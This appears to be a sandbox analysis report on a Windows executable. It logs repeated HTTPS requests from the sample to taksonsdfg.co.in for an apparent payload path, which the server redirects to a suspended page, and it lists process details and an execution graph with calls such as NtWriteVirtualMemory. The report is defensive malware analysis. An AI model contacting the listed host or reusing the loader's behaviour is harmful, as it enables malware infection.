                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:57 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:13:57 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:13:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                50192.168.2.750019108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:59 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:14:00 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:13:59 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:14:00 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                51192.168.2.750024108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:14:01 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:14:02 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:14:01 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:14:02 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:14:02 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:14:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                52192.168.2.750031108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:14:03 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:14:04 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:14:04 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:14:04 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                53192.168.2.750033108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:14:05 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:14:06 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:14:06 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:14:06 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:14:06 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:14:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                54192.168.2.750042108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:14:08 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:14:09 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:14:08 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:14:09 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                55192.168.2.750046108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:14:10 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:14:11 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:14:11 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:14:11 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:14:11 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:14:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Target ID:0
                                Start time:02:12:06
                                Start date:26/11/2024
                                Path:C:\Users\user\Desktop\6BE4RDldhw.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\6BE4RDldhw.exe"
                                Imagebase:0x400000
                                File size:1'483'264 bytes
                                MD5 hash:1A6538C76AE6EA94E5A6976ADF7DBD67
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Reputation:low
                                Has exited:false

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:4.9%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:16.9%
                                  Total number of Nodes:242
                                  Total number of Limit Nodes:9
                                  execution_graph 33415 2e9d2fc 33425 2e7656c 33415->33425 33419 2e9d32a 33430 2e9c358 timeSetEvent 33419->33430 33421 2e9d334 33422 2e9d342 GetMessageA 33421->33422 33423 2e9d336 TranslateMessage DispatchMessageA 33422->33423 33424 2e9d352 33422->33424 33423->33422 33426 2e76577 33425->33426 33431 2e74198 33426->33431 33429 2e742ac SysFreeString SysReAllocStringLen SysAllocStringLen 33429->33419 33430->33421 33432 2e741de 33431->33432 33433 2e74257 33432->33433 33434 2e743e8 33432->33434 33445 2e74130 33433->33445 33437 2e74419 33434->33437 33440 2e7442a 33434->33440 33450 2e7435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 33437->33450 33439 2e74423 33439->33440 33441 2e7446f FreeLibrary 33440->33441 33442 2e74493 33440->33442 33441->33440 33443 2e744a2 ExitProcess 33442->33443 33444 2e7449c 33442->33444 33444->33443 33446 2e74173 33445->33446 33447 2e74140 33445->33447 33446->33429 33447->33446 33451 2e715cc 33447->33451 33455 2e75868 33447->33455 33450->33439 33459 2e71560 33451->33459 33453 2e715d4 VirtualAlloc 33454 2e715eb 33453->33454 33454->33447 33456 2e75894 33455->33456 33457 2e75878 GetModuleFileNameA 33455->33457 33456->33447 33461 2e75acc GetModuleFileNameA RegOpenKeyExA 33457->33461 33460 2e71500 33459->33460 33460->33453 33462 2e75b4f 33461->33462 33463 2e75b0f RegOpenKeyExA 33461->33463 33479 2e75908 12 API calls 33462->33479 33463->33462 33464 2e75b2d RegOpenKeyExA 33463->33464 33464->33462 33466 2e75bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 33464->33466 33468 2e75cf2 33466->33468 33469 2e75c0f 33466->33469 33467 2e75b74 RegQueryValueExA 33470 2e75b94 RegQueryValueExA 33467->33470 33473 2e75bb2 RegCloseKey 33467->33473 33468->33456 33469->33468 33472 2e75c1f lstrlenA 33469->33472 33470->33473 33474 2e75c37 33472->33474 33473->33456 33474->33468 33475 2e75c84 33474->33475 33476 2e75c5c lstrcpynA LoadLibraryExA 33474->33476 33475->33468 33477 2e75c8e lstrcpynA LoadLibraryExA 33475->33477 33476->33475 33477->33468 33478 2e75cc0 lstrcpynA LoadLibraryExA 33477->33478 33478->33468 33479->33467 33480 2e9c34c 33483 2e8f7c4 33480->33483 33484 2e8f7cc 33483->33484 33484->33484 33485 2e8f7d3 33484->33485 36087 2e888c0 LoadLibraryW 33485->36087 33487 2e8f7ed 36092 2e72ee0 QueryPerformanceCounter 33487->36092 33489 2e8f7f2 33490 2e8f7fc InetIsOffline 33489->33490 33491 2e8f806 33490->33491 33492 2e8f817 33490->33492 36104 2e74530 33491->36104 33494 2e74530 11 API calls 33492->33494 33496 2e8f826 33494->33496 36095 2e74860 33496->36095 36110 2e8827c 36087->36110 36089 2e888f9 36121 2e87d80 36089->36121 36093 2e72eed 36092->36093 36094 2e72ef8 GetTickCount 36092->36094 36093->33489 36094->33489 36096 2e74871 36095->36096 36097 2e74897 36096->36097 36098 2e748ae 36096->36098 36099 2e74bcc 11 API calls 36097->36099 36100 2e745a0 11 API calls 36098->36100 36101 2e748a4 36099->36101 36100->36101 36102 2e748df 36101->36102 36103 2e74530 11 API calls 36101->36103 36103->36102 36105 2e74534 36104->36105 36108 2e74544 36104->36108 36107 2e745a0 11 API calls 36105->36107 36105->36108 36106 2e74572 36106->33496 36107->36108 36108->36106 36195 2e72c2c 11 API calls 36108->36195 36111 2e74530 11 API calls 36110->36111 36112 2e882a1 36111->36112 36135 2e87994 36112->36135 36116 2e882bb 36117 2e882c3 GetModuleHandleW GetProcAddress GetProcAddress 36116->36117 36118 2e882f6 36117->36118 36156 2e74500 36118->36156 36122 2e74530 11 API calls 36121->36122 36123 2e87da5 36122->36123 36124 2e87994 12 API calls 36123->36124 36125 2e87db2 36124->36125 36126 2e747ec 11 API calls 36125->36126 36127 2e87dc2 36126->36127 36184 2e881d4 36127->36184 36130 2e8827c 15 API calls 36131 2e87ddb NtWriteVirtualMemory 36130->36131 36132 2e87e07 36131->36132 36133 2e74500 11 API calls 36132->36133 36134 2e87e14 FreeLibrary 36133->36134 36134->33487 36136 2e879a5 36135->36136 36160 2e74bcc 36136->36160 36138 2e87a21 36141 2e747ec 36138->36141 36139 2e879b5 36139->36138 36169 2e7bac4 CharNextA 36139->36169 36142 2e74851 36141->36142 36143 2e747f0 36141->36143 36144 2e74530 36143->36144 36145 2e747f8 36143->36145 36149 2e745a0 11 API calls 36144->36149 36151 2e74544 36144->36151 36145->36142 36146 2e74807 36145->36146 36148 2e74530 11 API calls 36145->36148 36150 2e745a0 11 API calls 36146->36150 36147 2e74572 36147->36116 36148->36146 36149->36151 36153 2e74821 36150->36153 36151->36147 36182 2e72c2c 11 API calls 36151->36182 36154 2e74530 11 API calls 36153->36154 36155 2e7484d 36154->36155 36155->36116 36158 2e74506 36156->36158 36157 2e7452c 36157->36089 36158->36157 36183 2e72c2c 11 API calls 36158->36183 36161 2e74bd9 36160->36161 36168 2e74c09 36160->36168 36163 2e74c02 36161->36163 36164 2e74be5 36161->36164 36171 2e745a0 36163->36171 36170 2e72c44 11 API calls 36164->36170 36166 2e74bf3 36166->36139 36176 2e744dc 36168->36176 36169->36139 36170->36166 36172 2e745a4 36171->36172 36173 2e745c8 36171->36173 36180 2e72c10 11 API calls 36172->36180 36173->36168 36175 2e745b1 36175->36168 36177 2e744e2 36176->36177 36178 2e744fd 36176->36178 36177->36178 36181 2e72c2c 11 API calls 36177->36181 36178->36166 36180->36175 36181->36178 36182->36147 36183->36158 36185 2e74530 11 API calls 36184->36185 36186 2e881f7 36185->36186 36187 2e87994 12 API calls 36186->36187 36188 2e88204 36187->36188 36189 2e8820c GetModuleHandleA 36188->36189 36190 2e8827c 15 API calls 36189->36190 36191 2e8821d GetModuleHandleA 36190->36191 36192 2e8823b 36191->36192 36193 2e744dc 11 API calls 36192->36193 36194 2e87dd5 36193->36194 36194->36130 36195->36106 36196 2e71c6c 36197 2e71d04 36196->36197 36198 2e71c7c 36196->36198 36201 2e71d0d 36197->36201 36202 2e71f58 36197->36202 36199 2e71cc0 36198->36199 36200 2e71c89 36198->36200 36203 2e71724 10 API calls 36199->36203 36204 2e71c94 36200->36204 36244 2e71724 36200->36244 36206 2e71d25 36201->36206 36220 2e71e24 36201->36220 36205 2e71fec 36202->36205 36208 2e71fac 36202->36208 36209 2e71f68 36202->36209 36225 2e71cd7 36203->36225 36211 2e71d2c 36206->36211 36216 2e71d48 36206->36216 36217 2e71dfc 36206->36217 36213 2e71fb2 36208->36213 36218 2e71724 10 API calls 36208->36218 36214 2e71724 10 API calls 36209->36214 36210 2e71e7c 36215 2e71724 10 API calls 36210->36215 36233 2e71e95 36210->36233 36212 2e71cfd 36232 2e71f82 36214->36232 36229 2e71f2c 36215->36229 36224 2e71d79 Sleep 36216->36224 36236 2e71d9c 36216->36236 36221 2e71724 10 API calls 36217->36221 36235 2e71fc1 36218->36235 36219 2e71cb9 36220->36210 36223 2e71e55 Sleep 36220->36223 36220->36233 36238 2e71e05 36221->36238 36222 